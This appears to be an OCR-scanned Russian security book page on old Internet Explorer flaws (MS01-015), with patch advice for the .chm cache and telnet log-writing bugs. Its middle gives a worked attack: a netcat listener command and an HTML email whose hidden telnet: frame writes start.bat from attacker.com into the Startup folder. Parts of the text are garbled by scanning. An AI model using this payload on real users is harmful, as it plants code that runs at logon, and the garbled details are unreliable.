На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Защита от выполнения загруженных файлов .chm

Бюллетень
иг/1 1 /| Г г

MS01-015

аш

Исправлено в SP ;
*\

Фиксируется
Нет


Установите заплату из бюллетеня компании Microsoft MS01-015 (этаже заплата устраняет и некоторые другие уязвимые места) и отключите функцию Active Scripting (Активные сценарии) для соответствующей зоны безопасности IE (описание зон безопасности будет представлено ниже). На втором этапе программа атаки пытается загрузить документ в виде объекта, и если функция Active Scripting отключена, то здесь действие программы атаки прекратится. Хотя маловероятно, что пользователи согласятся отключить функцию Active Scripting для зоны Internet, ее обязательно следует отключить для зоны ограниченных узлов (Restricted Sites). К стыду Microsoft, по умолчанию для зоны ограниченных узлов функция Active Scripting включена. Программы Outlook/Outlook Express необходимо настроить таким образом, чтобы при чтении почты использовались настройки зоны безопасности для ограниченных узлов.
Запись данных в журнал клиента Telnet
Это уязвимое место основано на атаках двух типов — запись данных на диск и создание исходящих клиентских соединений. Возникает проблема при взаимодействии двух клиентских программ — программы Internet Explorer и клиента telnet, который устанавливается вместе с программой Windows Services for UNIX (SFU) 2.0. На самом деле — проблема в программе Internet Explorer, которая позволяет использовать параметры командной строки при запуске сеансов telnet с указанием адреса URL. Клиент telnet программы SFU поддерживает параметр - f, предназначенный для сохранения журнала сеанса на диск (клиент telnet, поставляемый с Windows 2000, этого не делает). При совпадении этих двух условий удаленный Web-узел или письмо в формате HTML могут записать на диск клиента произвольные данные. Рассмотрим, как это работает. Следующий адрес URL заставляет программу IE подключиться К удаленному узлу и записать журнал сеанса в файл С: \f ile. txt:
telnet:-f%20\file.tXt%20nMH„xocTa
Данные, которые записываются в журнал, можно задавать с удаленного узла. Хакеру проще всего это сделать, запустив на своем компьютере программу netcat, на вход которой подается текстовый файл. Например, возьмем файл hello . txt, который сохранен на машине злоумышленника.
@echo off
echo Hello World!
На машине хакера файл hello.txt направляется программе netcat, которая ждет подключения к ТСР-порту 80.
nc -n -1 -р SO -t -w 1 < hello.txt
Эта программа закроется через секунду после того, как к ней подключится клиент, прекрасно скрывая действия хакера. Хотя сеанс консоли остается открытым, он исчезнет после одного нажатия клавиши жертвой.
Исходящий трафик из ТСР-порта 80, скорее всего, будет пропущен брандмауэром, поскольку он похож на трафик внутренних Web-браузереа. Теперь злоумышленник отправляет избранной жертве по электронной почте сообщение, в котором есть гиперссылка на про­грамму telnet. Ниже показан текстовый файл, который можно направить почтовому серверу для доставки (в строке 12 разрыв строки был сделан вручную по причине ограниченной ширины страницы).
helo somedonrain.com mail from: mallory@malweary.com rcpt to: hapless@victim.net data
subject: Check out the new intranet<eom> MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <htial>
<frameset rows="100%, *"> <frame src=about:blank>
tframe sic=telnet:-£%20"\Documents%20ana%20Settings\Sll%20Users\ 4sstart%2 Qir,enu\programs\star tup\s tart .bat "*20attacker.com%2 080> </frameset> </html>
.- 'Лир0
quit
Когда цель атаки получит это письмо, данные будут получены с узла attacker . com. через порт 80 и записаны в файл start.bat, который расположен в общем для всех пользователей каталоге автозапуска. Когда в следующий раз кто-нибудь войдет в систему, файл start. bat будет запущен.
Еше одна интересная особенность приведенной программы атаки — использование скрытого фрейма для создания сеанса telnet. При просмотре файла в программе IE этот фрейм не отображается.
Благодарим Оливера Фредсрикса (Oliver Friederichs) из Security.com, который в марте 2001 года обнаружил эту проблему и опубликовал некоторые способы ее использования, приведенный выше материал основан на его информации.
Позже в данной главе будет описана еше одна ошибка, которая касается клиента telnet.
О Противодействие записи данных в журнал клиента telnet

Бюллетень Щ
MS01-015

BTD
2463

Исправлено в SP
2

Фиксируется
Нет

Как было замечено выше, при обсуждении записи файлов . chm в кэш программы ГЕ, исправление этой ошибки (и многих других ошибок) доступно в бюллетене MS05-O15. Специальная заплата для решения проблемы, связанной с клиентом telnet, описана в статье базы знаний Q286043. Это никак не отражается на клиенте telnet из пакета SFU, вместо этого вносится исправление в программу IE, после чего при интерпретации ссылок иа программу telnet аргументы командной строки не принимаются. Это исправление для IE можно установить на системах
с версиями программы IE 5.5 SP 1 и IE 5.01 SP1. Поскольку автоматическая интерпретация ссылок telnet предусмотрена при создании программы IE, исправить это с помощью настройки программы нельзя — необходимо установить заплату,

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика